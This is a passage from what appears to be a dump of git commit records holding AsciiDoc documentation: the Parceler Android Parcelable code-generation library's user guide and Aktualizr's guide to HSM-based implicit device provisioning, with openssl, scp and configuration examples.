use that constructor unless another constructor is annotated.\n\n==== Mixing getters\/setters and fields\nYou may also mix and match serialization techniques using the `@ParcelProperty` annotation.\nIn the following example, `firstName` and `lastName` are written to the bean using the constructor while `firstName` is read from the bean using the field and `lastName` is read using the `getLastName()` method.\nThe parameters `firstName` and `lastName` are coordinated by the parameter names `\"first\"` and `\"last\"` respectfully.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n @ParcelProperty(\"first\")\n String firstName;\n String lastName;\n\n @ParcelConstructor\n public Example(@ParcelProperty(\"first\") String firstName, @ParcelProperty(\"last\") String lastName){\n this.firstName = firstName;\n this.lastName = lastName;\n }\n\n public String getFirstName() { return firstName; }\n\n @ParcelProperty(\"last\")\n public String getLastName() { return lastName; }\n}\n----\n\nFor attributes that should not be serialized with Parceler, the attribute field, getter or setter may be annotated by `@Transient`.\n\nParceler supports many different styles centering around the POJO.\nThis allows `@Parcel` annotated classes to be used with other POJO based libraries, including https:\/\/code.google.com\/p\/google-gson\/[GSON], https:\/\/bitbucket.org\/qbusict\/cupboard[Cupboard], and http:\/\/simple.sourceforge.net\/[Simple XML] to name a few.\n\n==== Static Factory support\nAs an alternative to using a constructor directly, Parceler supports using an annotated Static Factory to build an instance of the given class.\nThis style supports Google's https:\/\/github.com\/google\/auto\/tree\/master\/value[AutoValue] annoation processor \/ code generation library for generating immutable beans.\nParceler interfaces with AutoValue via the `@ParcelFactory` annotation, which maps a static factory method into the annotated `@Parcel` serialization:\n\n[source,java]\n----\n@AutoValue\n@Parcel\npublic abstract class AutoValueParcel {\n\n @ParcelProperty(\"value\") public abstract String value();\n\n @ParcelFactory\n public static AutoValueParcel create(String value) {\n return new AutoValue_AutoValueParcel(value);\n }\n}\n----\n\nAutoValue generates a different class than the annotated `@Parcel`, therefore, you need to specify which class Parceler should build in the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrappedAutoValue = Parcels.wrap(AutoValueParcel.class, AutoValueParcel.create(\"example\"));\n----\nAnd to deserialize:\n[source,java]\n----\nAutoValueParcel autoValueParcel = Parcels.unwrap(wrappedAutoValue);\n----\n\n==== Custom serialization\n`@Parcel` includes an optional parameter to include a manual serializer `ParcelConverter` for the case where special serialization is necessary.\nThis provides a still cleaner option for using Parcelable classes than implementing them by hand.\n\nThe following code demonstrates using a `ParcelConverter` to unwrap the inheritance hierarchy during deserialization.\n\n[source,java]\n----\n@Parcel\npublic class Item {\n @ParcelPropertyConverter(ItemListParcelConverter.class)\n public List<Item> itemList;\n}\n@Parcel public class SubItem1 extends Item {}\n@Parcel public class SubItem2 extends Item {}\n\npublic class ItemListParcelConverter implements ParcelConverter<List<Item>> {\n @Override\n public void toParcel(List<Item> input, Parcel parcel) {\n if (input == null) {\n parcel.writeInt(-1);\n }\n else {\n parcel.writeInt(input.size());\n for (Item item : input) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n }\n }\n\n @Override\n public List<Item> fromParcel(Parcel parcel) {\n int size = parcel.readInt();\n if (size < 0) return null;\n List<Item> items = new ArrayList<Item>();\n for (int i = 0; i < size; ++i) {\n items.add((Item) Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader())));\n }\n return items;\n }\n}\n----\n\n=== Classes without Java source\nFor classes whose corresponding Java source is not available, one may include the class as a Parcel by using the `@ParcelClass` annotation.\nThis annotation may be declared anywhere in the compiled source that is convenient.\nFor instance, one could include the `@ParcelClass` along with the Android Application:\n\n[source,java]\n----\n@ParcelClass(LibraryParcel.class)\npublic class AndroidApplication extends Application{\n \/\/...\n}\n----\n\nMultiple `@ParcelClass` annotations may be declared using the `@ParcelClasses` annotation.\n\n=== Advanced configuration\n\n==== Skipping analysis\nIt is a common practice for some libraries to require a bean to extend a base class.\nAlthough it is not the most optimal case, Parceler supports this practice by allowing the configuration of what classes in the inheritance hierarchy to analyze via the analyze parameter:\n\n[source, java]\n----\n@Parcel(analyze = {One.class, Three.class})\nclass One extends Two {}\nclass Two extends Three {}\nclass Three extends BaseClass {}\n----\n\nIn this example, only fields of the `One` and `Three` classes will be serialized, avoiding both the `BaseClass` and `Two` class parameters.\n\n==== Specific wrapping\n\nThe Parcels utility class looks up the given class for wrapping by class.\nFor performance reasons this ignores inheritance, both super and base classes.\nThere are two solutions to this problem.\nFirst, one may specify additional types to associate to the given type via the `implementations` parameter:\n\n[source, java]\n----\nclass ExampleProxy extends Example {}\n@Parcel(implementations = {ExampleProxy.class})\nclass Example {}\n\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(proxy); \/\/ ExampleProxy will be serialized as a Example\n----\n\nSecond, one may also specify the class type when using the `Parcels.wrap()` method:\n\n[source, java]\n----\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(Example.class, proxy);\n----\n\n==== Avoiding Parcels indexing\n\nUsing Parceler in libraries can be challenging because Parceler writes a single mapping class `Parceler$$Parcels` to associate a given type with a `Parcelable`.\nThis mapping class can collide giving the following error during compilation:\n\n[source, bash]\n----\nError Code:\n 2\nOutput:\n UNEXPECTED TOP-LEVEL EXCEPTION:\n com.android.dex.DexException: Multiple dex files define Lorg\/parceler\/Parceler$$Parcels$1;\n at com.android.dx.merge.DexMerger.readSortableTypes(DexMerger.java:594)\n at com.android.dx.merge.DexMerger.getSortedTypes(DexMerger.java:552)\n at com.android.dx.merge.DexMerger.mergeClassDefs(DexMerger.java:533)\n ....\n----\n\nTo avoid writing this common mapping class, set `parcelsIndex = false` to each of the library classes.\nParceler will not write a `Parceler$$Parcels` mapping class if no indexable classes exist and the Parcels utiltiy class will fallback to looking up the generated class by name.\n\nAlternatively, using `@ParcelClass` in the root project, instead of annotating classes directly in the library can avoid this issue.\n\n==== Configuring Proguard\n\nTo configure Proguard, add the following lines to your proguard configuration file. These will keep files related to the `Parcels` utilty class and the `Parcelable` `CREATOR` instance:\n\n----\n# Parcel library\n-keep class * implements android.os.Parcelable {\n public static final android.os.Parcelable$Creator *;\n}\n\n-keep class org.parceler.Parceler$$Parcels\n----\n\n== Getting Parceler\n\nYou may download Parceler as a Maven dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler<\/artifactId>\n <version>${parceler.version}<\/version>\n <scope>provided<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler-api<\/artifactId>\n <version>${parceler.version}<\/version>\n<\/dependency>\n----\n\nor Gradle:\n[source,groovy]\n----\ncompile \"org.parceler:parceler-api:${parcelerVersion}\"\napt \"org.parceler:parceler:${parcelerVersion}\"\n----\n\nOr from http:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3A%22org.parceler%22[Maven Central].\n\n== License\n----\nCopyright 2011-2015 John Ericksen\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n----\n","old_contents":"---\nlayout: default\ntitle: Parceler\ndocumentationExpanded: false\npostsExpanded: false\n---\n\n=== Introduction\n\nIn Android, http:\/\/developer.android.com\/reference\/android\/os\/Parcelable.html[Parcelables] are a great way to serialize Java Objects between Contexts.\nhttp:\/\/www.developerphil.com\/parcelable-vs-serializable\/[Compared] with traditional Serialization, Parcelables take on the order of 10x less time to both serialize and deserialize.\nThere is a major flaw with Parcelables, however.\nParcelables contain a ton of boilerplate code.\nTo implement a Parcelable, you must mirror the `writeToParcel()` and `createFromParcel()` methods such that they read and write to the Parcel in the same order.\nAlso, a Parcelable must define a `public final static Parcelable.Creator CREATOR` in order for the Android infrastructure to be able to leverage the serialization code.\n\nParceler is a code generation library that generates the Android Parcelable boilerplate source code.\nNo longer do you have to implement the Parcelable interface, the `writeToParcel()` or `createFromParcel()` or the `public static final CREATOR`.\nYou simply annotate a POJO with `@Parcel` and Parceler does the rest.\nBecause Parceler uses the Java JSR-269 Annotation Processor, there is no need to run a tool manually to generate the Parcelable code.\nJust annotate your Java Bean, compile and you are finished.\nBy default, Parceler will serialize the fields of your instance directly:\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n int age;\n\n public Example(){ \/*Required empty bean constructor*\/ }\n\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nBe careful not to use private fields when using the default field serialization strategy as it will incur a performance penalty due to reflection.\n\nTo use the generated code, you may reference the generated class directly, or via the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrapped = Parcels.wrap(new Example(\"Andy\", 42));\n----\n\nTo dereference the `@Parcel`, just call the `Parcels.unwrap()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(wrapped);\nexample.getName(); \/\/ Andy\nexample.getAge(); \/\/ 42\n----\n\nOf course, the wrapped `Parcelable` can be added to an Android Bundle to transfer from Activity to Activity:\n\n[source,java]\n----\nBundle bundle = new Bundle();\nbundle.putParcelable(\"example\", Parcels.wrap(example));\n----\n\nAnd dereferenced in the `onCreate()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(this.getIntent().getExtras().get(\"example\"));\n----\n\nThis wrapping and unwrapping technique plays well with the Intent Factory pattern.\nIn addition, Parceler is supported by the following libraries:\n\n * http:\/\/androidtransfuse.org\/documentation.html#parcel[Transfuse] - Allows `@Parcel` annotated beans to be used with the `@Extra` injection.\n * https:\/\/github.com\/sockeqwe\/fragmentargs#argsbundler[FragmentArgs] - Uses the `ParcelerArgsBundler` adapter to wrap and unwrap `@Parcel` annotated beans with fragment parameters.\n * https:\/\/github.com\/f2prateek\/dart[Dart] - Autodetects `@Parcel` annotated beans and automatically unwraps them when using `@InjectExtra`.\n\n=== Parcel attribute types\nOnly a select number of types may be used as attributes of a `@Parcel` class.\nThe following list includes the mapped types:\n\n * `byte`\n * `double`\n * `float`\n * `int`\n * `long`\n * `char`\n * `boolean`\n * `String`\n * `IBinder`\n * `Bundle`\n * `SparseArray` of any of the mapped types*\n * `SparseBooleanArray`\n * `List`, `ArrayList` and `LinkedList` of any of the mapped types*\n * `Map`, `HashMap`, `LinkedHashMap`, `SortedMap`, and `TreeMap` of any of the mapped types*\n * `Set`, `HashSet`, `SortedSet`, `TreeSet`, `LinkedHashSet` of any of the mapped types*\n * `Parcelable`\n * `Serializable`\n * Array of any of the mapped types\n * Any other class annotated with `@Parcel`\n\n*Parcel will error if the generic parameter is not mapped.\n\nParceler also supports any of the above types directly.\nThis is especially useful when dealing with collections of classes annotated with `@Parcel`:\n\n[source,java]\n----\nParcelable listParcelable = Parcels.wrap(new ArrayList<Example>());\nParcelable mapParcelable = Parcels.wrap(new HashMap<String, Example>());\n----\n\n==== Polymorphism\nNote that Parceler does not unwrap inheritance hierarchies, so any polymorphic fields will be unwrapped as instances of the base class.\nThis is because Parceler opts for performance rather than checking `.getClass()` for every piece of data.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n public Parent p;\n Example(Parent p) { this.p = p; }\n}\n\n@Parcel public class Parent {}\n@Parcel public class Child extends Parent {}\n----\n\n[source,java]\n----\nExample example = new Example(new Child());\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ true\nexample = Parcels.unwrap(Parcels.wrap(example));\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ false\n----\n\nRefer to the <<custom-serialization,Custom Serialization>> section for an example of working with polymorphic fields.\n\n=== Serialization techniques\n\nParceler offers several choices for how to serialize and deserialize an object in addition to the field-based serialization seen above.\n\n==== Getter\/setter serialization\nParceler may be configured to serialize using getter and setter methods and a non-empty constructor.\nIn addition, fields, methods and constructor parameters may be associated using the `@ParcelProperty` annotation.\nThis supports a number of bean strategies including immutability and traditional getter\/setter beans.\n\nTo configure default method serialization, simply configure the `@Parcel` annotation with `Serialization.BEAN`:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private String name;\n private int age;\n\n public String getName() { return name; }\n public void setName(String name) { this.name = name; }\n\n public int getAge() { return age; }\n public void setAge(int age) { this.age = age; }\n}\n----\n\nTo use a constructor with serialization, annotate the desired constructor with the `@ParcelConstructor` annotation:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private final String name;\n private final int age;\n\n @ParcelConstructor\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nIf an empty constructor is present, Parceler will use that constructor unless another constructor is annotated.\n\n==== Mixing getters\/setters and fields\nYou may also mix and match serialization techniques using the `@ParcelProperty` annotation.\nIn the following example, `firstName` and `lastName` are written to the bean using the constructor while `firstName` is read from the bean using the field and `lastName` is read using the `getLastName()` method.\nThe parameters `firstName` and `lastName` are coordinated by the parameter names `\"first\"` and `\"last\"` respectfully.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n @ParcelProperty(\"first\")\n String firstName;\n String lastName;\n\n @ParcelConstructor\n public Example(@ParcelProperty(\"first\") String firstName, @ParcelProperty(\"last\") String lastName){\n this.firstName = firstName;\n this.lastName = lastName;\n }\n\n public String getFirstName() { return firstName; }\n\n @ParcelProperty(\"last\")\n public String getLastName() { return lastName; }\n}\n----\n\nFor attributes that should not be serialized with Parceler, the attribute field, getter or setter may be annotated by `@Transient`.\n\nParceler supports many different styles centering around the POJO.\nThis allows `@Parcel` annotated classes to be used with other POJO based libraries, including https:\/\/code.google.com\/p\/google-gson\/[GSON], https:\/\/bitbucket.org\/qbusict\/cupboard[Cupboard], and http:\/\/simple.sourceforge.net\/[Simple XML] to name a few.\n\n==== Static Factory support\nAs an alternative to using a constructor directly, Parceler supports using an annotated Static Factory to build an instance of the given class.\nThis style supports Google's https:\/\/github.com\/google\/auto\/tree\/master\/value[AutoValue] annoation processor \/ code generation library for generating immutable beans.\nParceler interfaces with AutoValue via the `@ParcelFactory` annotation, which maps a static factory method into the annotated `@Parcel` serialization:\n\n[source,java]\n----\n@AutoValue\n@Parcel\npublic abstract class AutoValueParcel {\n\n @ParcelProperty(\"value\") public abstract String value();\n\n @ParcelFactory\n public static AutoValueParcel create(String value) {\n return new AutoValue_AutoValueParcel(value);\n }\n}\n----\n\nAutoValue generates a different class than the annotated `@Parcel`, therefore, you need to specify which class Parceler should build in the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrappedAutoValue = Parcels.wrap(AutoValueParcel.class, AutoValueParcel.create(\"example\"));\n----\nAnd to deserialize:\n[source,java]\n----\nAutoValueParcel autoValueParcel = Parcels.unwrap(wrappedAutoValue);\n----\n\n==== Custom serialization\n`@Parcel` includes an optional parameter to include a manual serializer `ParcelConverter` for the case where special serialization is necessary.\nThis provides a still cleaner option for using Parcelable classes than implementing them by hand.\n\nThe following code demonstrates using a `ParcelConverter` to unwrap the inheritance hierarchy during deserialization.\n\n[source,java]\n----\n@Parcel\npublic class Item {\n @ParcelPropertyConverter(ItemListParcelConverter.class)\n public List<Item> itemList;\n}\n@Parcel public class SubItem1 extends Item {}\n@Parcel public class SubItem2 extends Item {}\n\npublic class ItemListParcelConverter implements ParcelConverter<List<Item>> {\n @Override\n public void toParcel(List<Item> input, Parcel parcel) {\n if (input == null) {\n parcel.writeInt(-1);\n }\n else {\n parcel.writeInt(input.size());\n for (Item item : input) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n }\n }\n\n @Override\n public List<Item> fromParcel(Parcel parcel) {\n int size = parcel.readInt();\n if (size < 0) return null;\n List<Item> items = new ArrayList<Item>();\n for (int i = 0; i < size; ++i) {\n items.add((Item) Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader())));\n }\n return items;\n }\n}\n----\n\n=== Classes without Java source\nFor classes whose corresponding Java source is not available, one may include the class as a Parcel by using the `@ParcelClass` annotation.\nThis annotation may be declared anywhere in the compiled source that is convenient.\nFor instance, one could include the `@ParcelClass` along with the Android Application:\n\n[source,java]\n----\n@ParcelClass(LibraryParcel.class)\npublic class AndroidApplication extends Application{\n \/\/...\n}\n----\n\nMultiple `@ParcelClass` annotations may be declared using the `@ParcelClasses` annotation.\n\n=== Advanced configuration\n\n==== Skipping analysis\nIt is a common practice for some libraries to require a bean to extend a base class.\nAlthough it is not the most optimal case, Parceler supports this practice by allowing the configuration of what classes in the inheritance hierarchy to analyze via the analyze parameter:\n\n[source, java]\n----\n@Parcel(analyze = {One.class, Three.class})\nclass One extends Two {}\nclass Two extends Three {}\nclass Three extends BaseClass {}\n----\n\nIn this example, only fields of the `One` and `Three` classes will be serialized, avoiding both the `BaseClass` and `Two` class parameters.\n\n==== Specific wrapping\n\nThe Parcels utility class looks up the given class for wrapping by class.\nFor performance reasons this ignores inheritance, both super and base classes.\nThere are two solutions to this problem.\nFirst, one may specify additional types to associate to the given type via the `implementations` parameter:\n\n[source, java]\n----\nclass ExampleProxy extends Example {}\n@Parcel(implementations = {ExampleProxy.class})\nclass Example {}\n\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(proxy); \/\/ ExampleProxy will be serialized as a Example\n----\n\nSecond, one may also specify the class type when using the `Parcels.wrap()` method:\n\n[source, java]\n----\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(Example.class, proxy);\n----\n\n==== Avoiding Parcels indexing\n\nUsing Parceler in libraries can be challenging because Parceler writes a single mapping class `Parceler$$Parcels` to associate a given type with a `Parcelable`.\nThis mapping class can collide giving the following error during compilation:\n\n[source, bash]\n----\nError Code:\n 2\nOutput:\n UNEXPECTED TOP-LEVEL EXCEPTION:\n com.android.dex.DexException: Multiple dex files define Lorg\/parceler\/Parceler$$Parcels$1;\n at com.android.dx.merge.DexMerger.readSortableTypes(DexMerger.java:594)\n at com.android.dx.merge.DexMerger.getSortedTypes(DexMerger.java:552)\n at com.android.dx.merge.DexMerger.mergeClassDefs(DexMerger.java:533)\n ....\n----\n\nTo avoid writing this common mapping class, set `parcelsIndex = false` to each of the library classes.\nParceler will not write a `Parceler$$Parcels` mapping class if no indexable classes exist and the Parcels utiltiy class will fallback to looking up the generated class by name.\n\nAlternatively, using `@ParcelClass` in the root project, instead of annotating classes directly in the library can avoid this issue.\n\n==== Configuring Proguard\n\nTo configure Proguard, add the following lines to your proguard configuration file. These will keep files related to the `Parcels` utilty class and the `Parcelable` `CREATOR` instance:\n\n----\n# Parcel library\n-keep class * implements android.os.Parcelable {\n public static final android.os.Parcelable$Creator *;\n}\n\n-keep class org.parceler.Parceler$$Parcels\n----\n\n== Getting Parceler\n\nYou may download Parceler as a Maven dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler<\/artifactId>\n <version>${parceler.version}<\/version>\n <scope>provided<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler-api<\/artifactId>\n <version>${parceler.version}<\/version>\n<\/dependency>\n----\n\nor Gradle:\n[source,groovy]\n----\ncompile \"org.parceler:parceler-api:${parcelerVersion}\"\napt \"org.parceler:parceler:${parcelerVersion}\"\n----\n\nOr from http:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3A%22org.parceler%22[Maven Central].\n\n== License\n----\nCopyright 2011-2015 John Ericksen\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"673ff580e9bdb5bb9f5c26b9cb9cda23c9e0ffad","subject":"updated hsm-provisioning docs with same change","message":"updated hsm-provisioning docs with same change\n\nSigned-off-by: EpicNuts <6ab4c33e0e9a1a158ee8b2405252330895b0dab1@gmail.com>\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/hsm-provisioning.adoc","new_file":"docs\/hsm-provisioning.adoc","new_contents":"= Implicit Provisioning with an HSM\n\nThis document describes the current support for implicit provisioning with an HSM in Aktualizr and https:\/\/github.com\/advancedtelematic\/meta-updater[meta-updater]. An example of this process is provided by using the `softhsm` software implementation of an HSM.\n\n== Background\n\nIn automatic provisioning, bootstrap credentials are downloaded and installed on devices to initiate the provisioning process. In implicit provisioning with an HSM, devices shall have an HSM that is pre-loaded with the requisite provisioning credentials. These credentials shall be signed by a root CA certificate which shall be uploaded to the server. The server will thus be able to authenticate a client device by verifying that the client's certificate was signed by the uploaded root CA.\n\n== Configuration\n\nThe following items are relevant for implicit provisioning:\n\n\/\/ tag::summary-table[]\n\n[options=header]\n|===================\n| Configuration option | Where it will come from\/what it does\n| Server URL | Read from credentials archive\n| Server Root CA cert | Read from credentials archive\n| Fleet Root CA cert | Chain of trust for a device fleet; provided by the user. Must be uploaded by user to the server.\n| Fleet Root CA private key | Key for signing device certs in the fleet; provided by user, but used only for signing. Not stored on device.\n| TLS device cert | Pre-installed in the device HSM; must be signed by Fleet Root CA private key\n| TLS device key | Pre-installed in the device HSM\n| Device ID | Read from Common Name field of TLS device cert\n| Uptane public\/private key | Automatically generated by Aktualizr\n| Uptane primary serial number | Automatically generated by Aktualizr\n| Primary ECU Hardware ID | Automatically generated by Aktualizr\n|===================\n\n\/\/ end::summary-table[]\n\nAn example `.toml` configuration file can be found at link:..\/config\/sota_hsm_prov.toml[]. This is what is used during bitbaking with meta-updater.\n\n== Steps\n\n\/\/ tag::full-instructions[]\n\n. Generate a root CA private key and self-signed certificate.\n+\nIf you do not have your own CA certificate for signing device certificates, you can generate a self-signed certificate for testing.\n+\nYou can examine the `new_server` function in link:https:\/\/github.com\/advancedtelematic\/ota-community-edition\/blob\/master\/scripts\/start.sh#L127[OTA Community Edition's `start.sh`] for one way of generating the cert.\n+\nThis will create a `.\/${SERVER_DIR}\/devices\/` directory with the `ca.crt` certificate and a `ca.key` private key. Keep the private key safe and secure.\n. Upload the root CA certificate to the server. To add a root CA certificate to link:https:\/\/connect.ota.here.com[HERE OTA Connect], contact link:mailto:otaconnect.support@here.com[otaconnect.support@here.com].\n. Generate a device certificate and key, and sign it with the root CA you just created.\n+\nExamine the link:https:\/\/github.com\/advancedtelematic\/ota-community-edition\/blob\/master\/scripts\/start.sh#L89[`new_client` function in start.sh] for one way to do that.\n. Add the internal root CA certificate of the device gateway the device will connect to. To get the device gateway's certificate, use openssl:\n+\n----\nexport device_gateway=your-gateway-url # for OTA Connect, looks something like\n # a3378fca-4e4c-4a5d-b1c2-d5c5ec35b3c2.tcpgw.prod01.advancedtelematic.com\nopenssl s_client -connect ${device_gateway}:8000 -servername $device_gateway -showcerts | \\\n sed -n '\/-BEGIN CERTIFICATE-\/,\/-END CERTIFICATE-\/p' > ${device_dir}\/root.crt\n----\n. Add the following lines to your `conf\/local.conf`:\n+\n----\nSOTA_CLIENT_FEATURES = \"hsm\"\nSOTA_CLIENT_PROV = \"aktualizr-hsm-prov\"\nSOTA_DEPLOY_CREDENTIALS = \"0\"\nIMAGE_INSTALL_append = \" softhsm-testtoken \"\n----\n. Build a standard image using bitbake. Make sure an ssh server is installed; usually you can do this with `IMAGE_INSTALL_append = \" dropbear \"`.\n. Boot the image.\n. Copy the device credentials and device gateway root CA certificate to the device's HSM. For the QEMU simulated HSM, enter the device directory whose credentials you wish to copy, then do:\n+\n----\nscp -P 2222 -pr .\/ root@localhost:\/var\/sota\/import\n----\n. The server authenticates the client device by verifying that the client's certificate was signed by the root CA private key that was uploaded in step 2.\n. The client device authenticates the server by verifying that the server's certificate was signed by the server's internal root CA private key.\n. The device is provisioned, and will appear online in the web UI.\n\n\/\/ end::full-instructions[]\n\n== Simulated implicit provisioning with `aktualizr-cert-provider`\n\nImplicit provisioning can be simulated with `aktualizr-cert-provider` without need for the user to create a root CA. `aktualizr-cert-provider` can use the existing autoprovisioning mechanisms to pre-install a certificate and key on the device.\n\n\/\/ tag::quick-instructions[]\n\n1. In local.conf, set `SOTA_CLIENT_FEATURES = \"hsm\"`, `SOTA_CLIENT_PROV = \"aktualizr-hsm-prov\"`, `SOTA_DEPLOY_CREDENTIALS = \"0\"`, and `IMAGE_INSTALL_append = \" softhsm-testtoken \"`. Currently, you will also need to set `SOTA_PACKED_CREDENTIALS` to provisioning credentials zip file.\n1. Build a standard image using bitbake.\n1. Boot the image.\n1. Optionally, verify that Aktualizr has not provisioned and that the device is not known to the server.\n1. Load credentials onto the device, for example with `aktualizr-cert-provider` from the Aktualizr repo: `aktualizr-cert-provider -c credentials.zip -t <device> -d \/var\/sota\/import -r -u`\n1. Verify that Aktualizr provisions correctly with the server using the expected Device ID.\n\n\/\/ end::quick-instructions[]\n\n== Credentials format\n\nThe provisioning credentials zip file format is specified in link:credentials.adoc[]. However, the only files in the archive used by `aktualizr-cert-provider` are `autoprov.url` and `autoprov_credentials.p12`. Note that `treehub.json` is required by `garage-sign`, and offline signing may require additional files.\n","old_contents":"= Implicit Provisioning with an HSM\n\nThis document describes the current support for implicit provisioning with an HSM in Aktualizr and https:\/\/github.com\/advancedtelematic\/meta-updater[meta-updater]. An example of this process is provided by using the `softhsm` software implementation of an HSM.\n\n== Background\n\nIn automatic provisioning, bootstrap credentials are downloaded and installed on devices to initiate the provisioning process. In implicit provisioning with an HSM, devices shall have an HSM that is pre-loaded with the requisite provisioning credentials. These credentials shall be signed by a root CA certificate which shall be uploaded to the server. The server will thus be able to authenticate a client device by verifying that the client's certificate was signed by the uploaded root CA.\n\n== Configuration\n\nThe following items are relevant for implicit provisioning:\n\n\/\/ tag::summary-table[]\n\n[options=header]\n|===================\n| Configuration option | Where it will come from\/what it does\n| Server URL | Read from credentials archive\n| Server Root CA cert | Read from credentials archive\n| Fleet Root CA cert | Chain of trust for a device fleet; provided by the user. Must be uploaded by user to the server.\n| Fleet Root CA private key | Key for signing device certs in the fleet; provided by user, but used only for signing. Not stored on device.\n| TLS device cert | Pre-installed in the device HSM; must be signed by Fleet Root CA private key\n| TLS device key | Pre-installed in the device HSM\n| Device ID | Read from Common Name field of TLS device cert\n| Uptane public\/private key | Automatically generated by Aktualizr\n| Uptane primary serial number | Automatically generated by Aktualizr\n| Primary ECU Hardware ID | Automatically generated by Aktualizr\n|===================\n\n\/\/ end::summary-table[]\n\nAn example `.toml` configuration file can be found at link:..\/config\/sota_hsm_prov.toml[]. This is what is used during bitbaking with meta-updater.\n\n== Steps\n\n\/\/ tag::full-instructions[]\n\n. Generate a root CA private key and self-signed certificate.\n+\nIf you do not have your own CA certificate for signing device certificates, you can generate a self-signed certificate for testing.\n+\nYou can examine the `new_server` function in link:https:\/\/github.com\/advancedtelematic\/ota-community-edition\/blob\/master\/scripts\/start.sh#L127[OTA Community Edition's `start.sh`] for one way of generating the cert.\n+\nThis will create a `.\/${SERVER_DIR}\/devices\/` directory with the `ca.crt` certificate and a `ca.key` private key. Keep the private key safe and secure.\n. Upload the root CA certificate to the server. To add a root CA certificate to link:https:\/\/connect.ota.here.com[HERE OTA Connect], contact link:mailto:otaconnect.support@here.com[otaconnect.support@here.com].\n. Generate a device certificate and key, and sign it with the root CA you just created.\n+\nExamine the link:https:\/\/github.com\/advancedtelematic\/ota-community-edition\/blob\/master\/scripts\/start.sh#L89[`new_client` function in start.sh] for one way to do that.\n. Add the internal root CA certificate of the device gateway the device will connect to. To get the device gateway's certificate, use openssl:\n+\n----\nexport device_gateway=your-gateway-url # for OTA Connect, looks something like\n # a3378fca-4e4c-4a5d-b1c2-d5c5ec35b3c2.tcpgw.prod01.advancedtelematic.com\nopenssl s_client -connect ${device_gateway}:8000 -servername $device_gateway -showcerts | \\\n sed -n '\/-BEGIN CERTIFICATE-\/,\/-END CERTIFICATE-\/p' > ${device_dir}\/root.crt\n----\n. Add the following lines to your `conf\/local.conf`:\n+\n----\nSOTA_CLIENT_FEATURES = \"hsm\"\nSOTA_CLIENT_PROV = \"aktualizr-hsm-prov\"\nSOTA_DEPLOY_CREDENTIALS = \"0\"\nIMAGE_INSTALL_append = \" softhsm-testtoken \"\n----\n. Build a standard image using bitbake. Make sure an ssh server is installed; usually you can do this with `IMAGE_INSTALL_append = \" dropbear \"`.\n. Boot the image.\n. Copy the device credentials and device gateway root CA certificate to the device's HSM. For the QEMU simulated HSM, enter the device directory whose credentials you wish to copy, then do:\n+\n----\nscp -P 2222 -pr .\/ root@localhost:\/var\/sota\/import\n----\n. The server authenticates the client device by verifying that the client's certificate was signed by the root CA private key that was uploaded in step 2.\n. The client device authenticates the server by verifying that the server's certificate was signed by the server's internal root CA private key.\n. The device is provisioned, and will appear online in the web UI.\n\n\/\/ end::full-instructions[]\n\n== Simulated implicit provisioning with `aktualizr-cert-provider`\n\nImplicit provisioning can be simulated with `aktualizr-cert-provider` without need for the user to create a root CA. `aktualizr-cert-provider` can use the existing autoprovisioning mechanisms to pre-install a certificate and key on the device.\n\n\/\/ tag::quick-instructions[]\n\n1. In meta-updater, set `SOTA_CLIENT_FEATURES = \"hsm\"`, `SOTA_CLIENT_PROV = \"aktualizr-hsm-prov\"`, `SOTA_DEPLOY_CREDENTIALS = \"0\"`, and `IMAGE_INSTALL_append = \" softhsm-testtoken \"`. Currently, you will also need to set `SOTA_PACKED_CREDENTIALS` to provisioning credentials zip file.\n1. Build a standard image using bitbake.\n1. Boot the image.\n1. Optionally, verify that Aktualizr 